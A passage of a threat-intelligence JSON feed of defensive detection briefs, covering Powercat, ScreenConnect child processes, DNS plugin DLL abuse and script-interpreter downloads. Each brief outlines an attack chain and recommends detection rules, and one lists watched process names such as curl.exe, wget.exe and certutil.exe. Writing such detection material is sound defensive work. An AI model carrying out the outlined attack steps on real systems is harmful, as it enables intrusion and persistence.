Overflow","url":"https://feed.craftedsignal.io/briefs/2026-03-jetaudio-stack-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","lateral-movement","powershell"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003ePowercat is a PowerShell script that functions similarly to the traditional Netcat utility, allowing for network communication using TCP and UDP. Attackers can use Powercat to establish reverse shells, transfer files, and perform port scanning within a compromised environment. This activity is often employed during post-exploitation phases to maintain access and propagate further into the network. Defenders should be aware of PowerShell scripts invoking Powercat, especially in environments…\u003c/p\u003e\n","date_modified":"2024-11-04T14:27:00Z","date_published":"2024-11-04T14:27:00Z","id":"/briefs/2024-11-powercat-detection/","summary":"Adversaries may leverage Powercat, a PowerShell implementation of Netcat, to establish command and control channels or perform lateral movement within a compromised network.","title":"Powercat PowerShell Implementation Detection","url":"https://feed.craftedsignal.io/briefs/2024-11-powercat-detection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["execution","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u0026rsquo;env\u0026rsquo; command in Linux is typically used to run a program in a modified environment without altering the existing environment variables. However, attackers can abuse this command to invoke a shell directly, potentially bypassing restricted environments. This is often a technique used for privilege escalation or executing arbitrary commands in situations where direct shell access is limited. This activity matters for defenders because it can indicate an attacker attempting to gain…\u003c/p\u003e\n","date_modified":"2024-10-26T12:00:00Z","date_published":"2024-10-26T12:00:00Z","id":"/briefs/2024-10-env-shell-invocation/","summary":"The 'env' command is used to invoke a shell on Linux systems, potentially bypassing restricted environments or escalating privileges to execute arbitrary commands.","title":"Linux Shell Invocation via Env Command","url":"https://feed.craftedsignal.io/briefs/2024-10-env-shell-invocation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["privilege-escalation","execution","persistence","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThe detection rule identifies the loading of unusual DLLs by the Windows DNS Server process (dns.exe), potentially indicating the abuse of the ServerLevelPluginDll functionality, as described in public research and proof-of-concept code. This technique allows attackers to load arbitrary DLLs into the DNS service, leading to privilege escalation and remote code execution with SYSTEM privileges. The rule focuses on detecting unsigned or untrusted DLLs loaded by dns.exe, highlighting potential exploitation attempts and unauthorized modifications to the DNS service. Successful exploitation grants the attacker elevated privileges, allowing them to perform malicious actions on the system. The rule is designed for data generated by Elastic Defend and supports Sysmon Event ID 7 (Image Loaded) as an additional data source.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the DNS Server configuration to enable the loading of server-level plugin DLLs.\u003c/li\u003e\n\u003cli\u003eThe attacker places a malicious, unsigned DLL in a location accessible to the DNS service.\u003c/li\u003e\n\u003cli\u003eThe DNS service (dns.exe) loads the malicious DLL upon startup or configuration change.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL executes code within the context of the DNS service, inheriting SYSTEM privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the elevated privileges to perform malicious actions, such as installing backdoors or modifying system settings.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence by ensuring the malicious DLL is loaded on subsequent system restarts.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code with SYSTEM privileges, granting them complete control over the compromised system. This can lead to data theft, system corruption, or the installation of persistent backdoors. The impact includes potential privilege escalation, remote code execution, and complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Unsigned DLL loaded by DNS Service\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnsure Sysmon Event ID 7 (Image Loaded) is enabled to provide the necessary data for the detection rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by reviewing the DLL file path and code signature status.\u003c/li\u003e\n\u003cli\u003eRegularly review and validate the DNS server configuration to ensure that only trusted DLLs are loaded.\u003c/li\u003e\n\u003cli\u003eImplement code signing policies to prevent the loading of unsigned DLLs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-07-03T12:00:00Z","date_published":"2024-07-03T12:00:00Z","id":"/briefs/2024-07-unsigned-dns-dll-load/","summary":"The rule identifies the loading of unusual or unsigned DLLs by the DNS Server process, which can indicate exploitation of the ServerLevelPluginDll functionality, potentially leading to privilege escalation and remote code execution with SYSTEM privileges.","title":"Unsigned DLL Loaded by DNS Service","url":"https://feed.craftedsignal.io/briefs/2024-07-unsigned-dns-dll-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Management Console File","Microsoft Defender XDR","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eAttackers may exploit Microsoft Management Console (MMC) by executing .msc files from non-standard directories to bypass security controls. This technique can be used for initial access and execution. This detection focuses on identifying the execution of \u003ccode\u003emmc.exe\u003c/code\u003e with \u003ccode\u003e.msc\u003c/code\u003e files from paths outside the typical system directories, which are generally considered trusted. By monitoring process executions and filtering out known legitimate paths, analysts can identify potentially malicious activity related to the misuse of MMC. The rule aims to detect deviations from standard administrative practices that could indicate unauthorized access or command execution via malicious or compromised \u003ccode\u003e.msc\u003c/code\u003e files. The detection logic specifically excludes executions from common directories like \u003ccode\u003eSystem32\u003c/code\u003e, \u003ccode\u003eSysWOW64\u003c/code\u003e, and \u003ccode\u003eProgram Files\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through an unspecified method.\u003c/li\u003e\n\u003cli\u003eThe attacker places a malicious \u003ccode\u003e.msc\u003c/code\u003e file in an unusual or untrusted directory (e.g., \u003ccode\u003eC:\\Users\\Public\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003emmc.exe\u003c/code\u003e with the malicious \u003ccode\u003e.msc\u003c/code\u003e file as an argument from the untrusted path.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emmc.exe\u003c/code\u003e processes the \u003ccode\u003e.msc\u003c/code\u003e file, potentially executing embedded commands or scripts.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003e.msc\u003c/code\u003e file performs unauthorized actions on the system, such as modifying system settings or executing arbitrary code.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the execution context of \u003ccode\u003emmc.exe\u003c/code\u003e to bypass security controls and escalate privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker may establish persistence by creating a scheduled task or modifying registry keys to execute the malicious \u003ccode\u003e.msc\u003c/code\u003e file automatically.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access, command execution, and privilege escalation, potentially compromising the entire system. While specific victim counts or sector targeting are not available, the technique is applicable across various Windows environments. The use of a trusted system binary like \u003ccode\u003emmc.exe\u003c/code\u003e for malicious purposes can evade traditional security measures, making detection more challenging.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eMicrosoft Management Console File from Unusual Path\u003c/code\u003e to detect the execution of \u003ccode\u003emmc.exe\u003c/code\u003e with \u003ccode\u003e.msc\u003c/code\u003e files from untrusted paths.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command-line arguments to provide the necessary data for the Sigma rule to function effectively.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the origin and content of the \u003ccode\u003e.msc\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eConsider implementing application control policies to restrict the execution of \u003ccode\u003e.msc\u003c/code\u003e files to authorized directories only.\u003c/li\u003e\n\u003cli\u003eReview and audit the use of MMC in the environment to identify any legitimate use cases that might trigger false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-07-03T10:00:00Z","date_published":"2024-07-03T10:00:00Z","id":"/briefs/2024-07-mmc-untrusted-path/","summary":"Adversaries may use Microsoft Management Console (MMC) files from untrusted paths to bypass security controls for initial access and execution on Windows systems.","title":"Microsoft Management Console File Execution from Unusual Path","url":"https://feed.craftedsignal.io/briefs/2024-07-mmc-untrusted-path/"},{"_cs_actors":[],"_cs_cves":[{"cvss":10,"id":"CVE-2024-1709"},{"cvss":8.4,"id":"CVE-2024-1708"}],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","ScreenConnect"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","defense-evasion","execution","persistence","screenconnect"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat brief focuses on the detection of suspicious activities related to the ScreenConnect remote access tool. ScreenConnect is a legitimate remote support software, but adversaries can exploit it to execute unauthorized commands on compromised systems. This detection identifies suspicious child processes spawned by ScreenConnect client processes, such as \u003ccode\u003eScreenConnect.ClientService.exe\u003c/code\u003e or \u003ccode\u003eScreenConnect.WindowsClient.exe\u003c/code\u003e, which can indicate malicious activities such as spawning PowerShell or cmd.exe with unusual arguments. This activity can indicate potential abuse of remote access capabilities, leading to data exfiltration, command and control communication, or the establishment of persistence mechanisms. Recent exploitation of CVE-2024-1709 and CVE-2024-1708 have highlighted the risk associated with ScreenConnect exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized access to a system with ScreenConnect installed. This could be achieved through exploiting vulnerabilities like CVE-2024-1709 and CVE-2024-1708, or through credential compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker uses ScreenConnect to connect to the compromised system remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the ScreenConnect interface to execute commands on the remote system.\u003c/li\u003e\n\u003cli\u003eThe attacker spawns a command interpreter, such as \u003ccode\u003ecmd.exe\u003c/code\u003e, using ScreenConnect. This process is a child process of the ScreenConnect client process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecmd.exe\u003c/code\u003e to execute malicious commands, such as downloading and executing a malicious payload.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker spawns \u003ccode\u003epowershell.exe\u003c/code\u003e with encoded commands or commands to download and execute malicious payloads from a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence by creating a scheduled task using \u003ccode\u003eschtasks.exe\u003c/code\u003e or creates a new service using \u003ccode\u003esc.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses tools like \u003ccode\u003enet.exe\u003c/code\u003e to modify user accounts or privileges to maintain access to the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to sensitive data, installation of malware, and establishment of persistent access to the compromised system. This can result in data theft, disruption of services, and further lateral movement within the network. The number of victims and specific sectors targeted varies depending on the attacker\u0026rsquo;s objectives, but the impact can be significant for organizations relying on ScreenConnect for remote support.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious child processes spawned by ScreenConnect and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for ScreenConnect client processes spawning suspicious child processes like \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eschtasks.exe\u003c/code\u003e, \u003ccode\u003esc.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ecurl.exe\u003c/code\u003e, \u003ccode\u003essh.exe\u003c/code\u003e, \u003ccode\u003escp.exe\u003c/code\u003e, \u003ccode\u003ewevtutil.exe\u003c/code\u003e, \u003ccode\u003ewget.exe\u003c/code\u003e, or \u003ccode\u003ewmic.exe\u003c/code\u003e as detailed in the Sigma rules.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to capture the necessary process execution data to activate the rules above.\u003c/li\u003e\n\u003cli\u003eReview and revoke any unauthorized user accounts or privileges that may have been created or modified using tools like \u003ccode\u003enet.exe\u003c/code\u003e as described in the attack chain.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-05-16T16:10:00Z","date_published":"2024-05-16T16:10:00Z","id":"/briefs/2024-05-screenconnect-child-process/","summary":"This rule identifies suspicious child processes spawned by ScreenConnect client processes, potentially indicating unauthorized access and command execution abusing ScreenConnect remote access software to perform malicious activities such as data exfiltration or establishing persistence.","title":"Suspicious ScreenConnect Client Child Process Activity","url":"https://feed.craftedsignal.io/briefs/2024-05-screenconnect-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","persistence","execution","registry-modification"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may leverage scripting engines, such as \u003ccode\u003ewscript.exe\u003c/code\u003e and \u003ccode\u003ecscript.exe\u003c/code\u003e, to directly modify the Windows Registry. These scripting engines are often abused for malicious purposes, including establishing persistence, escalating privileges, or disabling security controls. These scripting engines can modify the registry without using standard tools like \u003ccode\u003eregedit.exe\u003c/code\u003e or \u003ccode\u003ereg.exe\u003c/code\u003e, making it harder to detect malicious registry changes. Defenders should be aware of processes using these engines to modify the registry, as this behavior is uncommon in legitimate software installations or administrative tasks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system, potentially through social engineering or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a script (VBScript, JScript) via \u003ccode\u003ewscript.exe\u003c/code\u003e or \u003ccode\u003ecscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe script contains commands to modify specific registry keys, such as the Run key for persistence (T1547.001).\u003c/li\u003e\n\u003cli\u003eThe scripting engine process (e.g., \u003ccode\u003ewscript.exe\u003c/code\u003e) directly interacts with the Windows Registry to set the new values.\u003c/li\u003e\n\u003cli\u003eUpon system restart or user logon, the modified registry key triggers the execution of a malicious payload.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence on the compromised system, allowing for continued access and control.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the persistent access to perform lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to persistent access on compromised systems, enabling attackers to execute malicious code, steal sensitive information, or disrupt critical services. The registry modifications performed by scripting engines can bypass traditional security measures and make it difficult to detect and remediate the attack. This can result in significant data loss, financial damage, and reputational harm to affected organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Registry Tampering by Potentially Suspicious Processes\u0026rdquo; to your SIEM to detect suspicious registry modifications made by scripting engines.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule \u0026ldquo;Registry Tampering by Potentially Suspicious Processes\u0026rdquo; for unusual or unauthorized registry changes.\u003c/li\u003e\n\u003cli\u003eMonitor registry events for modifications made by processes such as \u003ccode\u003ewscript.exe\u003c/code\u003e and \u003ccode\u003ecscript.exe\u003c/code\u003e (logsource: registry_event).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-29T12:00:00Z","date_published":"2024-01-29T12:00:00Z","id":"/briefs/2024-01-29-susp-reg-mod/","summary":"The use of scripting engines like WScript and CScript to modify the Windows registry can indicate an attempt to bypass standard tools and evade defenses, potentially for persistence or other malicious activities.","title":"Suspicious Registry Modifications by Scripting Engines","url":"https://feed.craftedsignal.io/briefs/2024-01-29-susp-reg-mod/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Script Host"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","windows","script_interpreter"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers commonly use Windows Script Host (WSH) scripts as an initial access method or to download tools and utilities. This involves using built-in Windows script interpreters like \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e to download executable files from remote destinations. This behavior is significant because it allows attackers to bypass traditional defenses and establish a foothold in the system or download further tools. Defenders should monitor for suspicious network connections initiated by script interpreters followed by the creation of executable files on the system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (delivery mechanism not specified in source).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a script using \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe script interpreter makes an outbound network connection to a remote server.\u003c/li\u003e\n\u003cli\u003eThe remote server hosts a malicious executable file (e.g., .exe, .dll).\u003c/li\u003e\n\u003cli\u003eThe script downloads the malicious executable to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to disk.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded malicious file to establish persistence or further compromise the system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs additional actions, such as lateral movement or data exfiltration (not detailed in the source).\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the installation of malware, unauthorized access to sensitive data, and further compromise of the affected system. This can result in data breaches, financial losses, and reputational damage. The source does not contain specific victim numbers or sectors targeted.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Script Interpreter - File Creation\u0026rdquo; to your SIEM to detect the creation of executable files after network activity from \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Script Interpreter - Network Connection\u0026rdquo; to detect network connections from \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) and Event ID 11 (File Create) for enhanced visibility into network and file activity related to script interpreters.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-28T12:00:00Z","date_published":"2024-01-28T12:00:00Z","id":"/briefs/2024-01-28-remote-file-copy-scripts/","summary":"Attackers are using Windows script interpreters (cscript.exe or wscript.exe) to download executable files from remote locations to deliver second-stage payloads or download tools.","title":"Remote File Download via Script Interpreter","url":"https://feed.craftedsignal.io/briefs/2024-01-28-remote-file-copy-scripts/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows","Elastic Defend","Microsoft Defender XDR"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","privilege_escalation","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers may configure existing Windows services or create new ones to execute system shells, in order to elevate their privileges from administrator to SYSTEM. This tactic is used to gain SYSTEM permissions and establish persistence. The detection rule focuses on identifying instances where \u003ccode\u003eservices.exe\u003c/code\u003e is the parent process of a command shell (cmd.exe, powershell.exe, pwsh.exe, powershell_ise.exe), indicating that a service is being abused to run a shell. The rule is designed to work with data from Elastic Defend, CrowdStrike, Microsoft Defender XDR, SentinelOne Cloud Funnel, Sysmon, and Windows Security Event Logs.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the system with administrator privileges.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a legitimate service or creates a new service to abuse for privilege escalation.\u003c/li\u003e\n\u003cli\u003eAttacker modifies the service configuration to execute a command shell (cmd.exe, powershell.exe, pwsh.exe, or powershell_ise.exe). This may involve modifying the service\u0026rsquo;s executable path or adding command-line arguments.\u003c/li\u003e\n\u003cli\u003eThe system\u0026rsquo;s Service Control Manager (SCM) starts the service.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservices.exe\u003c/code\u003e spawns the configured command shell process.\u003c/li\u003e\n\u003cli\u003eThe command shell executes with SYSTEM privileges.\u003c/li\u003e\n\u003cli\u003eAttacker uses the SYSTEM shell to perform malicious activities, such as installing malware, accessing sensitive data, or creating new user accounts.\u003c/li\u003e\n\u003cli\u003eThe service continues to run, providing persistent access to the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation leads to privilege escalation to SYSTEM, granting the attacker complete control over the compromised system. This can result in data theft, malware installation, or further lateral movement within the network. The rule has a risk score of 47 and is categorized as medium severity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSystem Shells via Services\u003c/code\u003e to detect the execution of command shells spawned by \u003ccode\u003eservices.exe\u003c/code\u003e within your SIEM environment, and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any process creation events where \u003ccode\u003eservices.exe\u003c/code\u003e is the parent process of \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003epwsh.exe\u003c/code\u003e, or \u003ccode\u003epowershell_ise.exe\u003c/code\u003e using the investigation guide provided in the content section.\u003c/li\u003e\n\u003cli\u003eReview service creation and modification events in Windows Event Logs (Event IDs 4697 and 7045) for suspicious entries.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture detailed process information.\u003c/li\u003e\n\u003cli\u003eUtilize osquery to retrieve detailed service information to identify potentially malicious services. Reference queries $osquery_0, $osquery_1, and $osquery_2 in the investigation guide.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-26T12:00:00Z","date_published":"2024-01-26T12:00:00Z","id":"/briefs/2024-01-system-shells-via-services/","summary":"Attackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM, using services.exe as the parent process of the shell.","title":"System Shells Launched via Windows Services","url":"https://feed.craftedsignal.io/briefs/2024-01-system-shells-via-services/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","SentinelOne Cloud Funnel","Crowdstrike"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eThis detection rule identifies anomalous creation or modification of executable files by critical Windows system processes, like \u003ccode\u003esmss.exe\u003c/code\u003e, \u003ccode\u003ecsrss.exe\u003c/code\u003e, and \u003ccode\u003elsass.exe\u003c/code\u003e. Attackers may attempt to leverage these processes to evade detection, and the rule is designed to detect such activities. The rule leverages data from Elastic Defend, Microsoft Defender XDR, SentinelOne, CrowdStrike, and Sysmon. It provides investigation steps to help analysts triage and analyze potential incidents, focusing on the identity of the writing process, its lineage, and the characteristics of the written file. This rule is designed to detect potential remote code execution or other forms of exploitation targeting Windows systems. The rule logic excludes specific legitimate file paths to minimize false positives.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through methods such as phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker executes code on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to escalate privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a system critical process to create or modify an executable file.\u003c/li\u003e\n\u003cli\u003eThe created/modified file may be a backdoor, malware component, or a tool for further exploitation.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the created executable to establish persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the newly created executable to perform lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution with elevated privileges. The number of victims is dependent on the scope of the initial compromise. The targeted sectors include any organization running vulnerable Windows systems. If the attack succeeds, the adversary can gain full control over the system, leading to data theft, system disruption, or further propagation of malware.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Unusual Executable File Creation by a System Critical Process\u0026rdquo; detection rule to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon file creation logging (Event ID 11) to enhance detection capabilities (see setup instructions in the rule source).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule, paying close attention to the writing process\u0026rsquo;s identity, lineage, and the characteristics of the written file as detailed in the rule\u0026rsquo;s triage and analysis section.\u003c/li\u003e\n\u003cli\u003eCorrelate alerts from this rule with other endpoint and network activity to identify the scope of the potential compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-25T12:00:00Z","date_published":"2024-01-25T12:00:00Z","id":"/briefs/2024-01-25-unusual-executable-file-creation/","summary":"The rule identifies unexpected executable file creation or modification by critical Windows processes, potentially indicating remote code execution or exploitation attempts.","title":"Unusual Executable File Creation by a System Critical Process","url":"https://feed.craftedsignal.io/briefs/2024-01-25-unusual-executable-file-creation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["M365 Defender","SentinelOne Cloud Funnel","Crowdstrike"],"_cs_severities":["medium"],"_cs_tags":["execution","windows","scripting","archive"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eAttackers commonly use archive files (ZIP, RAR, 7z) to deliver malicious scripts, such as JScript and VBScript, to Windows systems. This technique allows them to bypass some initial security checks and deliver payloads that can execute arbitrary code. The \u0026ldquo;Windows Script Execution from Archive\u0026rdquo; detection identifies instances where Windows Script Host (wscript.exe) is launched from temporary directories containing extracted archive contents. This activity can indicate a user has opened a malicious archive, leading to potential malware execution. This detection focuses on the parent-child process relationship, where explorer.exe, winrar.exe, or 7zFM.exe spawns wscript.exe to execute scripts from the temp directory.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user receives a malicious archive file (e.g., ZIP, RAR, 7z) via email or downloads it from a website.\u003c/li\u003e\n\u003cli\u003eThe user opens the archive file using a file archiver tool like Explorer, WinRAR, or 7-Zip.\u003c/li\u003e\n\u003cli\u003eThe archiver extracts the contents, including a malicious JScript (.js) or VBScript (.vbs) file, to a temporary directory, such as \u003ccode\u003e\\Users\\*\\AppData\\Local\\Temp\\7z*\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe user (or the archiver tool) inadvertently executes the extracted script using Windows Script Host (wscript.exe).\u003c/li\u003e\n\u003cli\u003eWscript.exe executes the malicious script, which may perform a variety of actions, such as downloading and executing additional payloads.\u003c/li\u003e\n\u003cli\u003eThe script establishes persistence via registry modification, adding a run key to execute upon system startup.\u003c/li\u003e\n\u003cli\u003eThe script connects to a command-and-control server to receive further instructions.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the compromised system and begins lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack of this nature can lead to arbitrary code execution on the victim\u0026rsquo;s machine, potentially resulting in data theft, malware installation, or complete system compromise. While the number of affected organizations is not specified, the technique is broadly applicable to any Windows environment where users handle archive files, potentially affecting numerous individuals and organizations across various sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the execution of wscript.exe and its arguments.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Script Execution from Archive\u0026rdquo; to your SIEM to identify suspicious script execution 